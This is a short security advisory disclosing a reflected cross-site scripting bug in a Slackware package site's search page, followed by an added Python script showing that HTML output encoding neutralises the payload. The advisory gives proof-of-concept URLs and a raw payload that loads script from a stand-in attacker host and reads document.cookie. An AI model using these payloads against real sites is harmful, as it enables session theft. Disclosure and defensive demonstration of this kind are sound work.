kaneda@bohater.net

+ Subject:
XSS bug for www.linuxpackages.net

+ Version:
2007.01.12

+ Discovered by:
Kanedaaa: http://kaneda.bohater.net

+ Linuxpackages.net Description:
This site is dedicated to the enrichment and enhancement of the Slackware Linux operating system.
We are gathering a vast resource of Slackware packages from around the world. We feel that some of the other application sites have become too hard to use and it's hard to find a package just for you. Many times no links to packages are even provided.

+ Description:
XSS IN:
http://www.linuxpackages.net/search_view.php?by=name&name=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fattacker.com%2Fxss.js%3E%3C%2FSCRIPT%3E&ver=

http://www.linuxpackages.net/search_view.php?by=name&name=%22%3E%3CSCRIPT%3Ealert%28document.cookie%29%3C%2FSCRIPT%3E&ver=

Posted data:
"><SCRIPT SRC=http://attacker.com/xss.js></SCRIPT>
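
Added example (not part of the original advisory and not the site's code): it decodes the name parameter from the second URL above, reflects it into a form field with and without HTML output encoding, and uses an HTML parser to check whether a script element results. The form template is an assumption, since the advisory does not show the markup of search_view.php.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Second proof-of-concept URL from the advisory.
ADVISORY_URL = (
    "http://www.linuxpackages.net/search_view.php?by=name"
    "&name=%22%3E%3CSCRIPT%3Ealert%28document.cookie%29%3C%2FSCRIPT%3E&ver="
)

# Hypothetical template: the real markup of search_view.php is not on the page.
TEMPLATE = '<form><input type="text" name="name" value="{name}"></form>'


class ScriptCounter(HTMLParser):
    """Records script elements and input values as an HTML parser sees them."""

    def __init__(self):
        super().__init__()
        self.scripts = 0
        self.input_values = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":  # tag names arrive lower-cased
            self.scripts += 1
        elif tag == "input":
            self.input_values.append(dict(attrs).get("value"))


def name_param(url):
    """Return the URL-decoded `name` query parameter."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)["name"][0]


def render(name, encode):
    """Reflect `name` into the template, optionally HTML-encoding it first."""
    return TEMPLATE.format(name=escape(name, quote=True) if encode else name)


def inspect(page):
    """Return (number of script elements, list of input value attributes)."""
    parser = ScriptCounter()
    parser.feed(page)
    parser.close()
    return parser.scripts, parser.input_values


if __name__ == "__main__":
    value = name_param(ADVISORY_URL)
    print("unencoded:", inspect(render(value, encode=False)))
    print("encoded:  ", inspect(render(value, encode=True)))
```

With encoding, the quote and angle brackets stay inside the value attribute and the parser reports no script element; without it, the value attribute closes early and a script element follows.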



Timeline:
2007.01.12 bug discovered
2007.01.12 "/" bug sent via mail to http://linuxpackages.net

Original Advisory: http://kaneda.bohater.net/security/20070112-xss-linuxpackages.net.php
